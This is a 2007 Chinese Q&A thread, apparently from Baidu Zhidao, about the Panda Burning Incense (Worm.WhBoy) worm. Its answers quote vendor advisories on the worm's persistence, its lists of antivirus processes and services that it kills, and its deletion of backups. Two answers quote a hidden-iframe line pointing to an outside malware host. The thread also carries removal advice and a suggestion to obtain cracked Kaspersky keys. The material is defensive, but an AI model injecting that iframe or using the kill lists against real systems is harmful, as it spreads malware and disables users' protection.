谁知道 熊猫烧香着个病毒啊

我的QQ表情中有一个熊猫烧香的QQ表情 和熊猫烧香病毒的熊猫一样, 着是不是哪个病毒啊 我好害怕 怕是熊猫烧香病毒 ,听说着个病毒很厉害啊 , 还有是谁家有07年3月20号的燕赵都市报啊 如果有的话 麻烦你一下,在上边 找一找 上边有一小版快,说的是熊猫烧香病毒 上边有一个下载杀毒软件的网站地址 麻烦你给我说一下 我在着先写了

这不是病毒,是自定义表情,想了解更多关于熊猫烧香这个病毒吗,看下面:
瑞星: [快讯] 1月12号,瑞星全球反病毒监测网向企业局域网发布警告,目前“尼姆亚(也称熊猫烧香)”病毒的攻击重点正在转向企业局域网和网站,广大企业和网站应提高警惕紧密防范。瑞星反病毒专家介绍说,该病毒会在中毒电脑中所有的网页文件尾部添加病毒代码。一些网站编辑人员的电脑如果被该病毒感染,上传网页到网站后,就会导致用户浏览这些网站时也被病毒感染。

据悉,目前多家著名网站已经遭到此类攻击,而相继被植入病毒。由于这些网站的浏览量非常大,致使此次“熊猫烧香”病毒的感染范围非常广,中毒企业和政府机构已经超过千家,其中不乏金融、税务、能源等关系到国计民生的重要单位。

瑞星反病毒专家介绍说,“熊猫烧香”其实是“尼姆亚”病毒的新变种,最早出现在2006年的11月,到目前为止已经有数十个不同变种,在此期间瑞星已经发布针对该病毒的专杀工具,今天该工具已经升级,用户可以去瑞星网站(http://it.rising.com.cn/Channels/Service/index.shtml)免费下载使用。

除了通过网站带毒感染用户之外,此病毒还会在局域网中传播,在极短时间之内就可以感染几千台计算机,严重时可以导致网络瘫痪。中毒电脑上会出现“熊猫烧香”图案,所以也被称为“熊猫烧香”病毒。中毒电脑会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。

那么,用户应该如何防范“熊猫烧香”病毒的攻击?专家建议:

第一,安装杀毒软件和瑞星卡卡3.1,并在上网时打开网页实时监控。由于现在海底光缆中断,很多国外杀毒软件难以升级,瑞星杀毒软件免费为用户提供一个月服务,可以登陆:http://www.rising.com.cn 免费下载并使用。用户还可以通过瑞星在线专家门诊:http://help.rising.com.cn取得帮助。

第二,网站管理员应该更改机器密码,以防止病毒通过局域网传播。

第三,QQ、UC的漏洞已经被该病毒利用,用户应该去他们的官方网站打好最新补丁。

第四,该病毒会利用IE浏览器的漏洞进行攻击,因此用户应该给IE打好所有的补丁。如果必要的话,用户可以暂时换用Firefox、Opera等比较安全的浏览器。
江民:病毒名称:Worm.WhBoy.h
病毒中文名:熊猫烧香(武汉男生),近日又化身为“金猪报喜”

病毒类型:蠕虫

危险级别:★★★★★

影响平台:Win 9x/ME,Win 2000/NT,Win XP,Win 2003

专杀工具:金山专杀工具 安天专杀工具 江民专杀工具 安博士专杀工具 赛门铁克专杀工具

病毒描述:

“武汉男生”,俗称“熊猫烧香”,这是一个感染型的蠕虫病毒,它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件,该文件是一系统备份工具GHOST的备份文件,使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。

1:拷贝文件

病毒运行后,会把自己拷贝到C:\WINDOWS\System32\Drivers\spoclsv.exe

2:添加注册表自启动

病毒会添加自启动项HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run svcshare -> C:\WINDOWS\System32\Drivers\spoclsv.exe

3:病毒行为

a:每隔1秒寻找桌面窗口,并关闭窗口标题中含有以下字符的程序:

QQKav、QQAV、防火墙、进程、VirusScan、网镖、杀毒、毒霸、瑞星、江民、黄山IE、超级兔子、优化大师、木马克星、木马清道夫、QQ病毒、注册表编辑器、系统配置实用程序、卡巴斯基反病毒、Symantec AntiVirus、Duba、esteem proces、绿鹰PC、密码防盗、噬菌体、木马辅助查找器、System Safety Monitor、Wrapped gift Killer、Winsock Expert、游戏木马检测大师、msctls_statusbar32、pjf(ustc)、IceSword

并使用的键盘映射的方法关闭安全软件IceSword

添加注册表使自己自启动 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run svcshare -> C:\WINDOWS\System32\Drivers\spoclsv.exe

并中止系统中以下的进程:

Mcshield.exe、VsTskMgr.exe、naPrdMgr.exe、UpdaterUI.exe、TBMon.exe、scan32.exe、Ravmond.exe、CCenter.exe、RavTask.exe、Rav.exe、Ravmon.exe、RavmonD.exe、RavStub.exe、KVXP.kxp、kvMonXP.kxp、KVCenter.kxp、KVSrvXP.exe、KRegEx.exe、UIHost.exe、TrojDie.kxp、FrogAgent.exe、Logo1_.exe、Logo_1.exe、Rundl132.exe

b:每隔18秒点击病毒作者指定的网页,并用命令行检查系统中是否存在共享,共存在的话就运行net share命令关闭admin$共享

c:每隔10秒下载病毒作者指定的文件,并用命令行检查系统中是否存在共享,共存在的话就运行net share命令关闭admin$共享

d:每隔6秒删除安全软件在注册表中的键值

并修改以下值不显示隐藏文件 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue -> 0x00

删除以下服务:

navapsvc、wscsvc、KPfwSvc、SNDSrvc、ccProxy、ccEvtMgr、ccSetMgr、SPBBCSvc、Symantec Core LC、NPFMntor MskService、FireSvc

e:感染文件

病毒会感染扩展名为exe,pif,com,src的文件,把自己附加到文件的头部,并在扩展名为htm,html, asp,php,jsp,aspx的文件中添加一网址,用户一但打开了该文件,IE就会不断的在后台点击写入的网址,达到增加点击量的目的,但病毒不会感染以下文件夹名中的文件:

WINDOW、Winnt、System Volume Information、Recycled、Windows NT、WindowsUpdate、Windows Media Player、Outlook Express、Internet Explorer、NetMeeting、Common Files、ComPlus Applications、Messenger、InstallShield Installation Information、MSN、Microsoft Frontpage、Movie Maker、MSN Gamin Zone

g:删除文件

病毒会删除扩展名为gho的文件,该文件是一系统备份工具GHOST的备份文件使用户的系统备份文件丢失。
温馨提示:答案为网友推荐,仅供参考
第1个回答  2007-03-21
qq上的那个只是qq表情,并不是病毒,是你上面的网友用那个图片做的头像而已,真正的中毒特征是你硬盘里被感染的文件全部都变成了那个图片,专杀工具可以去瑞星的官方网站上找到。
地址是:http://it.rising.com.cn/Channels/Service/2006-11/1163505486d38734.shtml本回答被提问者采纳
第2个回答  2007-03-31
请耐心看完全文后,并理解了本人生涩的文字后再行动。

首先准备好鼎鼎大名的杀毒软件卡巴斯基5.0/6.0版本都可。准备好最新的病毒库,当然还有不可缺少的key文件。因为台湾地震的问题,卡巴斯基某些版本无法通过网络升级,需要本地升级最新病毒库。
卡巴斯基安装程序和卡巴斯基key下载网上有很多地方提供,可以去百度的卡巴斯基吧找链接下载。卡巴的最新病毒库可以去华军软件园www.newhua.com下载。

关于卡巴斯基的本地升级,网上有很多文章,可以参考下,不多说了。

在这里主要是解决一个问题:熊猫烧香病毒禁止绝大多数杀毒软件运行,包括国内国外的各大杀毒软件。禁止运行任务管理器和注册表管理器。瑞星等国内杀毒软件商提供的专杀工具一点用都不管。所以首先和最重要的是要解决安装卡巴斯基后可以让卡巴运行起来。

从网上查阅资料,得知熊猫烧香病毒在系统目录下windowssystem32drivers目录下生成一个spoclsv.exe文件,这样即使你进入安全模式,也会加载这个文件,所以就不要想在安全模式下杀掉病毒了。

记住一定不要双击盘符进入硬盘,要使用右键菜单进入!

所以,杀掉这个病毒的方法最简单不过了!首先只要删除spoclsv.exe就可以了!那么,只有一种方法,进入dos下删除该文件。你可以用win98光盘启动进入dos模式,也可以用win2000的命令行(这个好像是在开机的时候按F8出现吧,2000没用过几次,忘记了,不行也用启动盘好了。),xp可以用xp安装盘进入修复模式下就可以进dos了。

输入命令del c:\windows\system32\drivers\spoclsv.exe
回车后,该文件被删除。
本办法就是输入c:回车
cd..回车
直到只有c:
cd windows
cd system32
cd drivers
del spoclsv.exe
有够笨的。。

然后重新启动进入windows,这时候暂时是不会出现和运行spoclsv.exe的,赶紧安装卡巴斯基,安装后不要重新启动系统,点开始-程序,找到卡巴斯基,直接运行。(如果运行成功,恭喜你!你可以远离熊猫烧香了。。。。。)

本地升级卡巴斯基,升级后,立刻执行全盘扫描。在扫描的过程中,可能会出现各种系统错误,让你选择是/否。不要理他们,不要点确定/取消。

等到卡巴斯基全盘扫描完毕后,处理查出的病毒。

然后安装例如windows优化大师,超级兔子之类系统维护程序,找到开机运行,看看里面有哪些没必要开机启动的东西或不认识的或标记为病毒的开机程序,统统都删除掉。

运行任务管理器,将里面所有的系统允许结束的(除taskmgr.exe和卡巴程序外)进程结束,包括svchost,这时候系统会提示你还有1分钟倒计时关机。不要理他,继续结束进程,只要进程重新运行就结束他,坚持到系统自动重启。

等系统重新启动后,必须再用卡巴斯基扫描一遍全盘。因为上次安装后没有启动,卡巴有的服务不提供,有的病毒杀不出来,所以必须再用卡巴斯基扫描一遍全盘。

扫描完毕后,系统就没有熊猫烧香了。

本人原创,版权所有。
http://www.zzmo.cn 猪猪手机书奉献
第3个回答  2007-03-29
名称: 熊猫烧香专杀工具
版本: v3.7
大小: 148 KB
(此工具完全免费)

使用方法:先确定您是否已经中毒,如果已经中毒,直接运行专杀工具将会失败,病毒会阻止程序启动,请重启系统,按F8,选择安全模式,在安全模式中运行专杀工具即可。

更新时间:2007-1-26

熊猫烧香专杀工具介绍:

1、全面查杀"烧香"病毒
2、彻底清除目前所有的熊猫病毒以及熊猫变种
3、一键恢复,冷静面对
4、文件小巧,轻松下载
5、有效得保护您的电脑不受烧香病毒的侵害

立即下载熊猫烧香专杀工具

熊猫烧香病毒介绍

导语:这是一波电脑病毒蔓延的狂潮。在两个多月的时间里,数百万电脑用户被卷将进去,那只憨态可掬、颔首敬香的“熊猫”除而不尽。反病毒工程师们将它命名为“尼姆亚”。它还有一个更通俗的名字—“熊猫烧香”。

一个感染型的蠕虫病毒,它能感染系统中exe,com,pif,src,html,asp等文件,中止绝大部分的杀毒软件进程,并且会删除扩展为gho的文件,该文件是一系统备份工具GHOST的备份文件,最终使电脑用户的系统文件丢失,导致无法正常使用。

被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。(如上图)

“熊猫”病毒泛滥成灾,已经到了天怒人怨的地步。据不完全统计,国内感染“熊猫”病毒的企业已接近千家,其中外企用户居多,个人用户更是不计其数,损失惨重。

“熊猫烧香”病毒不但可以对用户系统进行破坏,导致大量应用软件无法使用,而且还可删除扩展名为gho的所有文件,造成用户的系统备份文件丢失,从而无法进行系统恢复;同时该病毒还能终止大量反病毒软件进程,大大降低用户系统的安全性。

中毒现象

1、在系统每个分区根目录下存在setup.exe和autorun.inf文件(A和B盘不感染)。

2、无法手工修改“文件夹选项”将隐藏文件显示出来。

3、在每个感染后的文件夹中可见Desktop_ini的隐藏文件,内容为感染日期 如:2007-1-16

4、电脑上的所有脚本文件中加入以下代码:<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>

5、中毒后的机器上常见的反病毒软件及防火墙无法正常开启及运行。

6、不能正常使用任务管理器,SREng.exe等工具。

7、无故的向外发包,连接局域网中其他机器。

注意:如果您发现电脑系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样,您可能已经感染熊猫病毒,请立即下载专杀工具进行查杀!
媒体报道:
熊猫病毒化身"金猪"毒性大发 密谋大闹春节
“熊猫烧香”被疑幕后黑手推动
熊猫烧香病毒攻击千家网站 作者留名武汉男孩

参考资料:wangshang

第4个回答  2007-03-21
熊猫专杀下载:http://tool.duba.net/zhuansha/253.shtml 金山官网的!
目前清除熊猫最有效的是金山出的!

确认机器是否中熊猫的方法:

1、在系统每个分区根目录下存在setup.exe和autorun.inf文件(A和B盘不感染)。

2、无法手工修改“文件夹选项”将隐藏文件显示出来。

3、在每个感染后的文件夹中可见Desktop_ini的隐藏文件,内容为感染日期 如:2007-1-16

4、电脑上的所有脚本文件中加入以下代码:<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>

5、中毒后的机器上常见的反病毒软件及防火墙无法正常开启及运行。

6、不能正常使用任务管理器,SREng.exe等工具。

7、无故的向外发包,连接局域网中其他机器。

主要是看第一条和第三条的!如果有这种情况的话,说明中熊猫了并且杀毒软件不能正常使用~
相似回答
大家正在搜